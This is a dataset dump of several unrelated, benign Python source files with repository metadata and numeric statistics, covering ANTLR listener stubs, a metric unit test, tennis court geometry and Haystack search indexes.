| 36.338129 | 79 | 0.676104 | 629 | 5,051 | 5.109698 | 0.08903 | 0.125389 | 0.084007 | 0.078407 | 0.925638 | 0.917548 | 0.917548 | 0.917548 | 0.917548 | 0.903858 | 0 | 0.002279 | 0.218175 | 5,051 | 138 | 80 | 36.601449 | 0.811598 | 0 | 0 | 0.72 | 0 | 0 | 0.107899 | 0.094239 | 0 | 0 | 0 | 0 | 0.09 | 1 | 0.09 | false | 0 | 0.04 | 0 | 0.14 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
066e9821ba970fa93e8e1320fca7b3e973abcecb | 163 | py | Python | sploy/ploy/tasks.py | estackhub/sploy | fb4a758137ca6a538c5b7a27203b82befd027d55 | [
"MIT"
] | null | null | null | sploy/ploy/tasks.py | estackhub/sploy | fb4a758137ca6a538c5b7a27203b82befd027d55 | [
"MIT"
] | null | null | null | sploy/ploy/tasks.py | estackhub/sploy | fb4a758137ca6a538c5b7a27203b82befd027d55 | [
"MIT"
] | null | null | null |
from sploy.sploy.api.allot import validate_files_space_limit, validate_db_space_limit
def daily():
validate_files_space_limit()
validate_db_space_limit() | 27.166667 | 85 | 0.822086 | 24 | 163 | 5.083333 | 0.5 | 0.327869 | 0.295082 | 0.377049 | 0.704918 | 0.704918 | 0.704918 | 0.704918 | 0 | 0 | 0 | 0 | 0.110429 | 163 | 6 | 86 | 27.166667 | 0.841379 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
88c8f460a7c40dc0e9bbbfb8b809b6fcf50d6073 | 297 | py | Python | platform/hwconf_data/ezr32wg/modules/WDOG/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | null | null | null | platform/hwconf_data/ezr32wg/modules/WDOG/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | 1 | 2020-08-25T02:36:22.000Z | 2020-08-25T02:36:22.000Z | platform/hwconf_data/ezr32wg/modules/WDOG/__init__.py | lenloe1/v2.7 | 9ac9c4a7bb37987af382c80647f42d84db5f2e1d | [
"Zlib"
] | 1 | 2020-08-25T01:56:04.000Z | 2020-08-25T01:56:04.000Z | import ezr32wg.halconfig.halconfig_types as halconfig_types
import ezr32wg.halconfig.halconfig_dependency as halconfig_dependency
import ezr32wg.PythonSnippet.ExporterModel as ExporterModel
import ezr32wg.PythonSnippet.RuntimeModel as RuntimeModel
import ezr32wg.PythonSnippet.Metadata as Metadata | 59.4 | 69 | 0.902357 | 34 | 297 | 7.764706 | 0.294118 | 0.246212 | 0.295455 | 0.234848 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035971 | 0.063973 | 297 | 5 | 70 | 59.4 | 0.913669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0034097a90616cacc82300d52c1f7ef3d61d1502 | 178 | py | Python | sportsdataverse/nfl/__init__.py | saiemgilani/sportsdataverse-py | 77ae3accbb071b5308335b931e4e55a65e1500cd | [
"MIT"
] | 12 | 2021-10-15T01:24:18.000Z | 2022-03-15T17:00:22.000Z | sportsdataverse/nfl/__init__.py | saiemgilani/sportsdataverse-py | 77ae3accbb071b5308335b931e4e55a65e1500cd | [
"MIT"
] | 19 | 2021-11-02T05:53:41.000Z | 2022-03-16T14:16:51.000Z | sportsdataverse/nfl/__init__.py | saiemgilani/sportsdataverse-py | 77ae3accbb071b5308335b931e4e55a65e1500cd | [
"MIT"
] | 1 | 2021-12-21T14:49:25.000Z | 2021-12-21T14:49:25.000Z | from sportsdataverse.nfl.nfl_loaders import *
from sportsdataverse.nfl.nfl_pbp import *
from sportsdataverse.nfl.nfl_schedule import *
from sportsdataverse.nfl.nfl_teams import * | 44.5 | 46 | 0.848315 | 24 | 178 | 6.125 | 0.333333 | 0.517007 | 0.598639 | 0.680272 | 0.632653 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08427 | 178 | 4 | 47 | 44.5 | 0.90184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
003ba175f7960f71e6163f55b1dd944840b46b88 | 8,948 | py | Python | src/scheduled-query/azext_scheduled_query/grammar/scheduled_query/ScheduleQueryConditionListener.py | YingXue/azure-cli-extensions | 30086b7fe22ed591daaae9019920db6c16aef9de | [
"MIT"
] | 2 | 2021-06-05T17:51:26.000Z | 2021-11-17T11:17:56.000Z | src/scheduled-query/azext_scheduled_query/grammar/scheduled_query/ScheduleQueryConditionListener.py | YingXue/azure-cli-extensions | 30086b7fe22ed591daaae9019920db6c16aef9de | [
"MIT"
] | 1 | 2020-06-12T01:39:40.000Z | 2020-06-12T01:39:40.000Z | src/scheduled-query/azext_scheduled_query/grammar/scheduled_query/ScheduleQueryConditionListener.py | YingXue/azure-cli-extensions | 30086b7fe22ed591daaae9019920db6c16aef9de | [
"MIT"
] | 1 | 2019-05-02T00:55:30.000Z | 2019-05-02T00:55:30.000Z | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=all
# Generated from ScheduleQueryCondition.g4 by ANTLR 4.7.2
from antlr4 import *
# This class defines a complete listener for a parse tree produced by ScheduleQueryConditionParser.
class ScheduleQueryConditionListener(ParseTreeListener):
# Enter a parse tree produced by ScheduleQueryConditionParser#expression.
def enterExpression(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#expression.
def exitExpression(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#aggregation.
def enterAggregation(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#aggregation.
def exitAggregation(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#comes_from.
def enterComes_from(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#comes_from.
def exitComes_from(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#namespace.
def enterNamespace(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#namespace.
def exitNamespace(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#metric_with_quote.
def enterMetric_with_quote(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#metric_with_quote.
def exitMetric_with_quote(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#metric.
def enterMetric(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#metric.
def exitMetric(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#query_with_quote.
def enterQuery_with_quote(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#query_with_quote.
def exitQuery_with_quote(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#query.
def enterQuery(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#query.
def exitQuery(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#operator.
def enterOperator(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#operator.
def exitOperator(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#threshold.
def enterThreshold(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#threshold.
def exitThreshold(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#resource_column.
def enterResource_column(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#resource_column.
def exitResource_column(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#resource_id.
def enterResource_id(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#resource_id.
def exitResource_id(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#resource.
def enterResource(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#resource.
def exitResource(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#column.
def enterColumn(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#column.
def exitColumn(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#falling_period.
def enterFalling_period(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#falling_period.
def exitFalling_period(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#at.
def enterAt(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#at.
def exitAt(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#least.
def enterLeast(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#least.
def exitLeast(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#violations.
def enterViolations(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#violations.
def exitViolations(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#out.
def enterOut(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#out.
def exitOut(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#of.
def enterOf(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#of.
def exitOf(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#min_times.
def enterMin_times(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#min_times.
def exitMin_times(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#aggregated.
def enterAggregated(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#aggregated.
def exitAggregated(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#points.
def enterPoints(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#points.
def exitPoints(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#evaluation_period.
def enterEvaluation_period(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#evaluation_period.
def exitEvaluation_period(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#where.
def enterWhere(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#where.
def exitWhere(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dimensions.
def enterDimensions(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dimensions.
def exitDimensions(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dimension.
def enterDimension(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dimension.
def exitDimension(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dim_separator.
def enterDim_separator(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dim_separator.
def exitDim_separator(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dim_operator.
def enterDim_operator(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dim_operator.
def exitDim_operator(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dim_val_separator.
def enterDim_val_separator(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dim_val_separator.
def exitDim_val_separator(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dim_name.
def enterDim_name(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dim_name.
def exitDim_name(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dim_values.
def enterDim_values(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dim_values.
def exitDim_values(self, ctx):
pass
# Enter a parse tree produced by ScheduleQueryConditionParser#dim_value.
def enterDim_value(self, ctx):
pass
# Exit a parse tree produced by ScheduleQueryConditionParser#dim_value.
def exitDim_value(self, ctx):
pass
| 28.957929 | 99 | 0.700939 | 979 | 8,948 | 6.337079 | 0.134831 | 0.064797 | 0.107995 | 0.194391 | 0.824952 | 0.823985 | 0.816248 | 0.815442 | 0.752257 | 0.713894 | 0 | 0.00072 | 0.224184 | 8,948 | 308 | 100 | 29.051948 | 0.89297 | 0.572977 | 0 | 0.492537 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.492537 | false | 0.492537 | 0.007463 | 0 | 0.507463 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 10 |
004aaa8579fd4e78509442ee408d665e8599e5ab | 9,698 | py | Python | tests/metrics/test_request_per_type.py | aliariff/argus | b8948aa7103e8e5a682c4da89010e7c66aa80ab8 | [
"MIT"
] | null | null | null | tests/metrics/test_request_per_type.py | aliariff/argus | b8948aa7103e8e5a682c4da89010e7c66aa80ab8 | [
"MIT"
] | null | null | null | tests/metrics/test_request_per_type.py | aliariff/argus | b8948aa7103e8e5a682c4da89010e7c66aa80ab8 | [
"MIT"
] | null | null | null |
from argus.metrics.request_per_type import RequestPerType
import pytest
import tests.samples.loader as loader
class TestRequestPerType(object):
@pytest.fixture
def obj(self):
obj = RequestPerType(loader.load_sample())
return obj
def test_measurement(self, obj):
assert obj.measurement() == "request_per_type"
def test_is_valid(self, obj):
assert obj.is_valid() == True
def test_fill(self, obj):
assert obj.fill() == [
{
"fields": {"value": 8},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "html",
"id": "180904_HF_JMH",
"media_type": "text",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 4},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "css",
"id": "180904_HF_JMH",
"media_type": "text",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 13},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "javascript",
"id": "180904_HF_JMH",
"media_type": "application",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 5},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "font-woff2",
"id": "180904_HF_JMH",
"media_type": "application",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 21},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "javascript",
"id": "180904_HF_JMH",
"media_type": "text",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 53},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "webp",
"id": "180904_HF_JMH",
"media_type": "image",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 8},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "png",
"id": "180904_HF_JMH",
"media_type": "image",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 15},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "jpeg",
"id": "180904_HF_JMH",
"media_type": "image",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 22},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "gif",
"id": "180904_HF_JMH",
"media_type": "image",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 4},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "x-javascript",
"id": "180904_HF_JMH",
"media_type": "application",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 5},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "json",
"id": "180904_HF_JMH",
"media_type": "application",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 1},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "font-woff",
"id": "180904_HF_JMH",
"media_type": "application",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 2},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "plain",
"id": "180904_HF_JMH",
"media_type": "text",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
{
"fields": {"value": 1},
"measurement": "request_per_type",
"tags": {
"browser": "Chrome",
"city": "North America",
"connection": "Cable",
"country": "USA",
"device": "Machine",
"extension": "x-icon",
"id": "180904_HF_JMH",
"media_type": "image",
"region": "Dulles",
"website": "http://www.barenecessities.com",
},
"time": "2018-09-04T07:36:27Z",
},
]
| 37.3 | 64 | 0.353166 | 639 | 9,698 | 5.234742 | 0.140845 | 0.047833 | 0.066966 | 0.112108 | 0.88849 | 0.88849 | 0.88849 | 0.88849 | 0.88849 | 0.88849 | 0 | 0.061678 | 0.498453 | 9,698 | 259 | 65 | 37.444015 | 0.626028 | 0 | 0 | 0.703557 | 0 | 0 | 0.333815 | 0 | 0 | 0 | 0 | 0 | 0.011858 | 1 | 0.01581 | false | 0 | 0.011858 | 0 | 0.035573 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cc588ff001de766365f713b56393c47ee95e25a1 | 4,833 | py | Python | data/tenniscourt.py | camilo-nb/Dongui-Pong | 68f521ca5e731ea8cf060a9335fcdcfad6eb3ad8 | [
"MIT"
] | null | null | null | data/tenniscourt.py | camilo-nb/Dongui-Pong | 68f521ca5e731ea8cf060a9335fcdcfad6eb3ad8 | [
"MIT"
] | null | null | null | data/tenniscourt.py | camilo-nb/Dongui-Pong | 68f521ca5e731ea8cf060a9335fcdcfad6eb3ad8 | [
"MIT"
] | null | null | null | import numpy as np
class TennisCourt:
def __init__(self, length, singles_width, doubles_width, service_line_length, net_height, net_post_width, FLOOR, NEAR, SHIFT):
self.length = length
self.singles_width = singles_width
self.doubles_width = doubles_width
self.service_line_length = service_line_length
self.net_height = net_height
self.net_post_width = net_post_width
self.FLOOR = FLOOR
self.NEAR = NEAR
self.SHIFT = SHIFT
# see tennis_court_graph.png
self.vertices = np.array(
[
#
[-self.doubles_width / 2 , self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
[-self.singles_width / 2 , self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
[self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
[self.doubles_width / 2 , self.FLOOR, self.NEAR + self.SHIFT + self.length, 1],
#
[-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 + self.service_line_length, 1],
[0, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 + self.service_line_length, 1],
[self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 + self.service_line_length, 1],
#
[-self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
[-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
[0, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
[self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
[self.doubles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2, 1],
#
[-self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 - self.service_line_length, 1],
[0, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 - self.service_line_length, 1],
[self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT + self.length / 2 - self.service_line_length, 1],
#
[-self.doubles_width / 2 , self.FLOOR, self.NEAR + self.SHIFT, 1],
[-self.singles_width / 2 , self.FLOOR, self.NEAR + self.SHIFT, 1],
[self.singles_width / 2, self.FLOOR, self.NEAR + self.SHIFT, 1],
[self.doubles_width / 2 , self.FLOOR, self.NEAR + self.SHIFT, 1],
]
)
self.lines = np.array(
[
#[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8]#
[0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],#0
[1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],#1
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],#2
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],#3
[0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],#4
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],#5
[0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],#6
[1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],#7
[0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0],#8
[0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],#9
[0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0],#0
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1],#1
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0],#2
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0],#3
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0],#4
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],#5
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0],#6
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1],#7
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]# 8
]
)
self.area = np.array(
#[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 1, 2, 3, 4, 5, 6, 7, 8]#
[1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1]
)
@staticmethod
def ITP_singles(cls, FLOOR, NEAR, SHIFT):
"""https://en.wikipedia.org/wiki/Tennis_court#Dimensions"""
return cls(
length=2377,
singles_width=823,
doubles_width=1097,
service_line_length=640,
net_height=107,
net_post_width=91,
FLOOR=FLOOR,
NEAR=NEAR,
SHIFT=SHIFT
) | 53.7 | 130 | 0.451479 | 828 | 4,833 | 2.557971 | 0.067633 | 0.241737 | 0.288952 | 0.31728 | 0.719075 | 0.716714 | 0.714353 | 0.714353 | 0.714353 | 0.712465 | 0 | 0.165955 | 0.37037 | 4,833 | 90 | 131 | 53.7 | 0.530069 | 0.044486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0 | 0.013514 | 0 | 0.067568 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
aeec05604534cea6f1d76e4c801eb781074ea437 | 1,678 | py | Python | pizzaca2/certs/search_indexes.py | ffaraone/pizzaca2 | 6ecc64d34fe431f45f48e008699866ca53b3e1b0 | [
"Apache-1.1"
] | null | null | null | pizzaca2/certs/search_indexes.py | ffaraone/pizzaca2 | 6ecc64d34fe431f45f48e008699866ca53b3e1b0 | [
"Apache-1.1"
] | null | null | null | pizzaca2/certs/search_indexes.py | ffaraone/pizzaca2 | 6ecc64d34fe431f45f48e008699866ca53b3e1b0 | [
"Apache-1.1"
] | null | null | null | from haystack import indexes
from .models import Identity, Server
class IdentityIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = Identity
text = indexes.CharField(document=True, use_template=True)
country = indexes.CharField()
crl_reason = indexes.CharField()
issuer = indexes.CharField()
issuer_operators = indexes.MultiValueField()
def index_queryset(self, using=None):
"""Used when the entire index for model is updated."""
return self.get_model().objects.all()
def prepare_issuer_operators(self, obj):
return [op.pk for op in obj.issuer.operators.all()]
def prepare_issuer(self, obj):
return str(obj.issuer)
def prepare_country(self, obj):
return obj.get_C_display()
def prepare_crl_reason(self, obj):
return obj.get_crl_reason_display()
class ServerIndex(indexes.ModelSearchIndex, indexes.Indexable):
class Meta:
model = Server
text = indexes.CharField(document=True, use_template=True)
country = indexes.CharField()
crl_reason = indexes.CharField()
issuer = indexes.CharField()
issuer_operators = indexes.MultiValueField()
def index_queryset(self, using=None):
"""Used when the entire index for model is updated."""
return self.get_model().objects.all()
def prepare_issuer_operators(self, obj):
return [op.pk for op in obj.issuer.operators.all()]
def prepare_issuer(self, obj):
return str(obj.issuer)
def prepare_country(self, obj):
return obj.get_C_display()
def prepare_crl_reason(self, obj):
return obj.get_crl_reason_display()
| 28.440678 | 65 | 0.690703 | 209 | 1,678 | 5.392345 | 0.244019 | 0.113576 | 0.09228 | 0.067436 | 0.908607 | 0.908607 | 0.908607 | 0.814552 | 0.814552 | 0.814552 | 0 | 0 | 0.209178 | 1,678 | 58 | 66 | 28.931034 | 0.849284 | 0.057807 | 0 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.052632 | 0.210526 | 0.947368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
aef91ee63ffa1db4c5032c74b4fcc876f060072d | 10,473 | py | Python | tests/integration/modules/test_vault.py | xiaohuazi123/salt | 599966292c463667db31140d276a8db8675364e5 | [
"Apache-2.0",
"MIT"
